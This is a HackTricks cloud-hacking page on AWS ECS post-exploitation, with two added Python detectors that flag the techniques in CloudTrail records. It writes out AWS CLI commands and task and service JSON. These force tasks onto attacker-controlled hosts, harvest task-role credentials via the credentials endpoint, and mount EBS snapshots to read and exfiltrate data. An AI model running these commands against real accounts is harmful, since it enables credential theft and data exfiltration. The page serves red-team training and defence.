AWS - ECS Post Exploitation
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ECS
For more information check:
Host IAM Roles
In ECS, an IAM role can be attached to the task running inside the container. If the task is run inside an EC2 instance, that EC2 instance will have another IAM role attached to it.
This means that if you manage to compromise an ECS instance you could potentially obtain the IAM role associated with the ECR and the EC2 instance. For more information on how to get those credentials check:
Caution
IMDSv2 with a hop limit of 1 does not block awsvpc or host-networked tasks—only Docker bridge tasks sit far enough away for the responses to die. See ECS-on-EC2 IMDS Abuse & ECS Agent Impersonation for the full attack workflow and bypass notes. Recent Latacora research shows that awsvpc and host tasks still fetch host credentials even when IMDSv2+h=1 is enforced.
Privesc to node to steal other containers creds & secrets
Moreover, EC2 uses docker to run ECS tasks, so if you can escape to the node or get access to the docker socket, you can check which other containers are running, and even get inside them and steal their attached IAM roles.
Making containers run in current host
Moreover, the EC2 instance role will usually have enough permissions to update the container instance state of the EC2 instances being used as nodes inside the cluster. An attacker could modify the state of an instance to DRAINING, then ECS will remove all the tasks from it and the ones being run as REPLICA will be run in a different instance, potentially inside the attacker's instance so he can steal their IAM roles and the potential sensitive information from inside the container.
aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>
The same technique can be done by deregistering the EC2 instance from the cluster. This is potentially less stealthy, but it will force tasks to be run in other instances:
aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force
A final technique to force the re-execution of tasks is to indicate to ECS that the task or container was stopped. There are 3 potential APIs to do this:
# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
--status STOPPED --reason "anything" --containers [...]
# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...
# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...
Join the Cluster With an Attacker Host (Register Container Instance)
Another variant (more deterministic than "draining") is to add capacity you control to the cluster by registering an EC2 instance as a container instance (ecs:RegisterContainerInstance) and setting the required container instance attributes so that placement constraints match. Once tasks are placed on your host, you can inspect/exec into the containers and harvest the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI credentials.
See the ECS privesc page section about ecs:RegisterContainerInstance for the full flow.
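From the defender's side, every technique in this section (DRAINING, deregistration, forged STOPPED states, registering a new container instance) is a control-plane API call that lands in CloudTrail. The following is an added example (not code from the HackTricks page) that flags those records; the event names are the real ECS API names, while the principals, cluster and record bodies are constructed.

```python
# Added example (not from the HackTricks page): flag CloudTrail records for the
# ECS calls that force tasks onto other hosts (DRAINING, deregistration, forged
# STOPPED states) or add attacker-controlled capacity (RegisterContainerInstance).
# Records below are constructed; principals and cluster names are placeholders.
RESCHEDULE_EVENTS = {
    "UpdateContainerInstancesState": "node set to DRAINING, its tasks relaunch elsewhere",
    "DeregisterContainerInstance": "node removed from cluster, its tasks relaunch elsewhere",
    "SubmitTaskStateChange": "task reported STOPPED, ECS relaunches it",
    "SubmitContainerStateChange": "container reported stopped, ECS relaunches its task",
    "SubmitAttachmentStateChanges": "attachment state forged",
    "RegisterContainerInstance": "new host joined the cluster and can receive tasks",
}

def suspicious_ecs_events(records, trusted_prefixes=()):
    """Return (eventName, cluster, principal ARN, reason) for each record matching
    one of the events above that was not issued by a trusted principal (ARN prefix
    match, e.g. the node instance role, which legitimately reports state changes).
    UpdateContainerInstancesState only counts when the new status is DRAINING."""
    hits = []
    for rec in records:
        name = rec.get("eventName")
        if name not in RESCHEDULE_EVENTS:
            continue
        params = rec.get("requestParameters") or {}
        if name == "UpdateContainerInstancesState" and params.get("status") != "DRAINING":
            continue
        principal = rec.get("userIdentity", {}).get("arn", "unknown")
        if any(principal.startswith(p) for p in trusted_prefixes):
            continue
        hits.append((name, params.get("cluster", "unknown"), principal, RESCHEDULE_EVENTS[name]))
    return hits

# Constructed sample: an IAM user drains and then deregisters a node, the node's
# instance role reports a task state change, and an unrelated call is ignored.
NODE_ROLE_PREFIX = "arn:aws:sts::111122223333:assumed-role/ecsInstanceRole/"
USER = "arn:aws:iam::111122223333:user/dev"
SAMPLE_RECORDS = [
    {"eventName": "UpdateContainerInstancesState", "userIdentity": {"arn": USER},
     "requestParameters": {"cluster": "prod", "status": "DRAINING", "containerInstances": ["ci-1"]}},
    {"eventName": "DeregisterContainerInstance", "userIdentity": {"arn": USER},
     "requestParameters": {"cluster": "prod", "containerInstance": "ci-1", "force": True}},
    {"eventName": "SubmitTaskStateChange", "userIdentity": {"arn": NODE_ROLE_PREFIX + "i-0abc"},
     "requestParameters": {"cluster": "prod", "status": "STOPPED"}},
    {"eventName": "DescribeTasks", "userIdentity": {"arn": USER},
     "requestParameters": {"cluster": "prod"}},
]

if __name__ == "__main__":
    for hit in suspicious_ecs_events(SAMPLE_RECORDS, (NODE_ROLE_PREFIX,)):
        print(hit)
```

Capacity-provider scale-in and legitimate node maintenance also issue DRAINING calls, so the trusted-prefix list should cover those automation roles before the rule is used for alerting.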
Steal sensitive info from ECR containers
That EC2 instance will probably also have the permission ecr:GetAuthorizationToken allowing it to download images (you could search for sensitive info in them).
Steal Task Role Credentials via ecs:ExecuteCommand
If ExecuteCommand is enabled on the task, a principal with ecs:ExecuteCommand + ecs:DescribeTasks can open a shell inside the running container and then query the task credentials endpoint to harvest the task role credentials:
- From inside the container: curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
- Use the returned AccessKeyId/SecretAccessKey/Token to call AWS APIs as the task role
Check the ECS privilege escalation page for enumeration and command examples.
Mount an EBS snapshot directly in an ECS task (configuredAtLaunch + volumeConfigurations)
Abuse the native ECS EBS integration (2024+) to mount the contents of an existing EBS snapshot directly inside a new ECS task/service and read its data from within the container.
- Required (minimum):
  - ecs:RegisterTaskDefinition
  - One of: ecs:RunTask OR ecs:CreateService/ecs:UpdateService
  - iam:PassRole on:
    - The ECS infrastructure role used for volumes (policy: service-role/AmazonECSInfrastructureRolePolicyForVolumes)
    - The task execution/task roles referenced by the task definition
  - If the snapshot is encrypted with a CMK: KMS permissions for the infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).
- Impact: Read the disk contents from the snapshot (e.g. database files) inside the container and exfiltrate the data via network/logs.
Steps (Fargate example):
- Create the ECS infrastructure role (if it does not exist) and attach the managed policy:
aws iam create-role --role-name ecsInfrastructureRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsInfrastructureRole \
--policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes
- Register a task definition with a volume marked configuredAtLaunch and mount it in the container. Example (prints the secret then sleeps):
{
"family": "ht-ebs-read",
"networkMode": "awsvpc",
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
"executionRoleArn": "arn:aws:iam::<ACCOUNT_ID>:role/ecsTaskExecutionRole",
"containerDefinitions": [
{"name":"reader","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["cat /loot/secret.txt || true; sleep 3600"],
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/ebs","awslogs-stream-prefix":"reader"}},
"mountPoints":[{"sourceVolume":"loot","containerPath":"/loot","readOnly":true}]
}
],
"volumes": [ {"name":"loot", "configuredAtLaunch": true} ]
}
- Create or update the service passing the EBS snapshot via volumeConfigurations.managedEBSVolume (requires iam:PassRole on the infra role). Example:
{
"cluster": "ht-ecs-ebs",
"serviceName": "ht-ebs-svc",
"taskDefinition": "ht-ebs-read",
"desiredCount": 1,
"launchType": "FARGATE",
"networkConfiguration": {"awsvpcConfiguration":{"assignPublicIp":"ENABLED","subnets":["subnet-xxxxxxxx"],"securityGroups":["sg-xxxxxxxx"]}},
"volumeConfigurations": [
{"name":"loot","managedEBSVolume": {"roleArn":"arn:aws:iam::<ACCOUNT_ID>:role/ecsInfrastructureRole", "snapshotId":"snap-xxxxxxxx", "filesystemType":"ext4"}}
]
}
- When the task starts, the container can read the snapshot contents at the configured mount path (e.g. /loot). Exfiltrate via network/task logs.
Cleanup:
aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count 0
aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
aws ecs deregister-task-definition ht-ebs-read
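The procedure above leaves a two-step trail: a RegisterTaskDefinition with a configuredAtLaunch volume, followed by a CreateService/UpdateService/RunTask whose volumeConfigurations name a snapshotId. The following is an added example (not code from the HackTricks page) that correlates the two; the records are constructed to mirror the request bodies shown above, and it is an assumption that real CloudTrail requestParameters keep the same nesting.

```python
# Added example (not from the HackTricks page): correlate the two calls the EBS
# snapshot mount needs. A configuredAtLaunch volume is harmless alone; the finding
# is a CreateService/UpdateService/RunTask binding that volume to a snapshot.
# Records are constructed; matching real CloudTrail nesting is an assumption.
LAUNCH_EVENTS = {"CreateService", "UpdateService", "RunTask"}

def snapshot_mounts(records, approved_snapshots=frozenset()):
    """Return (eventName, family, volume, snapshotId, infra roleArn, containerPath)
    per managed EBS volume restored from a snapshot not in approved_snapshots.
    containerPath is None when no registered task definition mounts the volume."""
    launch_volumes = {}  # family -> {configuredAtLaunch volume name: containerPath}
    for rec in records:
        if rec.get("eventName") != "RegisterTaskDefinition":
            continue
        p = rec.get("requestParameters") or {}
        names = {v["name"] for v in p.get("volumes", []) if v.get("configuredAtLaunch")}
        mounts = {n: None for n in names}
        for c in p.get("containerDefinitions", []):
            for m in c.get("mountPoints", []):
                if m.get("sourceVolume") in names:
                    mounts[m["sourceVolume"]] = m.get("containerPath")
        launch_volumes[p.get("family")] = mounts
    findings = []
    for rec in records:
        name = rec.get("eventName")
        if name not in LAUNCH_EVENTS:
            continue
        p = rec.get("requestParameters") or {}
        # taskDefinition may be "family", "family:3" or a full ARN; reduce to family.
        family = p.get("taskDefinition", "").split("/")[-1].split(":")[0]
        for vc in p.get("volumeConfigurations", []):
            ebs = vc.get("managedEBSVolume") or {}
            snap = ebs.get("snapshotId")
            if not snap or snap in approved_snapshots:
                continue
            path = launch_volumes.get(family, {}).get(vc.get("name"))
            findings.append((name, family, vc.get("name"), snap, ebs.get("roleArn"), path))
    return findings

INFRA_ROLE = "arn:aws:iam::111122223333:role/ecsInfrastructureRole"  # constructed
SAMPLE_RECORDS = [  # constructed: task def from the page, one service, one ad-hoc task
    {"eventName": "RegisterTaskDefinition", "requestParameters": {"family": "ht-ebs-read",
        "volumes": [{"name": "loot", "configuredAtLaunch": True}],
        "containerDefinitions": [{"name": "reader", "mountPoints": [
            {"sourceVolume": "loot", "containerPath": "/loot", "readOnly": True}]}]}},
    {"eventName": "CreateService", "requestParameters": {"cluster": "ht-ecs-ebs",
        "serviceName": "ht-ebs-svc", "taskDefinition": "ht-ebs-read:1", "volumeConfigurations": [
            {"name": "loot", "managedEBSVolume": {"roleArn": INFRA_ROLE,
                "snapshotId": "snap-attacker-constructed", "filesystemType": "ext4"}}]}},
    {"eventName": "RunTask", "requestParameters": {"cluster": "ht-ecs-ebs",
        "taskDefinition": "ht-ebs-read", "volumeConfigurations": [{"name": "loot",
            "managedEBSVolume": {"roleArn": INFRA_ROLE, "snapshotId": "snap-approved-constructed"}}]}},
]
```

A PassRole of the infrastructure role by a principal that does not normally deploy ECS services is the natural second signal to pair with these findings.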